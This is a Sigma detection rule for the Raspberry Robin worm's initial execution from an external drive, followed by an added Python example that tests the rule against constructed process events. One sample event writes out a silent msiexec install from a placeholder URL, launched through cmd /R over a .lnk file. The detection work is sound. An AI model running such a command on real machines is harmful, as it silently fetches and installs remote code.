Raspberry Robin initial execution from external drive

Detects execution from the external drive using cmd

Sigma rule

title: Raspberry Robin initial execution from external drive
id: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a
description: Detects execution from the external drive using cmd
status: experimental
date: 2022/05/06
author: '@kostastsale'
references:
    - https://redcanary.com/blog/raspberry-robin/
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        ParentImage|endswith:
            - '\cmd.exe'
        ParentCommandLine|contains:
            - '/r'
        Image|endswith:
            - '\msiexec.exe'
        CommandLine|contains:
            - '/q'
            - '-q'
    selection2:
        CommandLine|contains:
            - 'http:'
            - 'https:'
        ParentCommandLine|endswith:
            - '.usb'
            - '.ico'
            - '.lnk'
            - '.bin'
            - '.sv'
            - '.lo'
    condition: selection1 and selection2
falsepositives:
    - Unlikely
level: high
tags:
    - attack.execution
    - attack.T1059.001
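Evaluating the rule's two selections and their AND condition over constructed process_creation events, as an added example that is not the rule author's or the Sigma project's code; the helper names, the Sysmon-style field dicts and the sample paths and URL are assumptions for illustration.

```python
# Added example, not part of the Sigma rule or the Sigma project: evaluates the rule's
# selection1 AND selection2 condition over constructed Sysmon-style process_creation
# events. Matching is case-insensitive, as Sigma string matching is by default.

def ci_endswith(value, suffixes):  # Sigma 'endswith' modifier over a value list
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)

def ci_contains(value, needles):  # Sigma 'contains' modifier over a value list
    v = value.lower()
    return any(n.lower() in v for n in needles)

def selection1(ev):
    """cmd.exe with /r spawning msiexec.exe with a quiet switch."""
    return (ci_endswith(ev["ParentImage"], ["\\cmd.exe"])
            and ci_contains(ev["ParentCommandLine"], ["/r"])
            and ci_endswith(ev["Image"], ["\\msiexec.exe"])
            and ci_contains(ev["CommandLine"], ["/q", "-q"]))

def selection2(ev):
    """msiexec fetching from a URL while the parent command line ends in a drive artifact."""
    return (ci_contains(ev["CommandLine"], ["http:", "https:"])
            and ci_endswith(ev["ParentCommandLine"],
                            [".usb", ".ico", ".lnk", ".bin", ".sv", ".lo"]))

def matches(ev):  # the rule's condition: selection1 and selection2
    return selection1(ev) and selection2(ev)

# Constructed sample events (not real telemetry); paths and URL are placeholders.
SAMPLE_EVENTS = [
    {   # 0: should match; cmd /R over a .lnk on a removable drive, quiet remote MSI install
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r"cmd /R type D:\shortcut.lnk",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": "msiexec /q /i http://example.invalid/pkg.msi"},
    {   # 1: benign quiet install of a local MSI; parent is Explorer, not cmd.exe
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /q /i C:\Users\alice\Downloads\tool.msi"},
    {   # 2: selection1 alone fires, but no URL and no artifact suffix, so no alert
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r"cmd /r msiexec /q /i C:\pkg\tool.msi",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /q /i C:\pkg\tool.msi"},
]

def alerts(events):  # indices of events satisfying the full rule condition
    return [i for i, ev in enumerate(events) if matches(ev)]
```

Event 2 shows why the rule requires both selections: a quiet local msiexec launched via cmd /r satisfies selection1 on its own, and only the URL plus drive-artifact suffix in selection2 separates it from the behaviour the rule targets.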
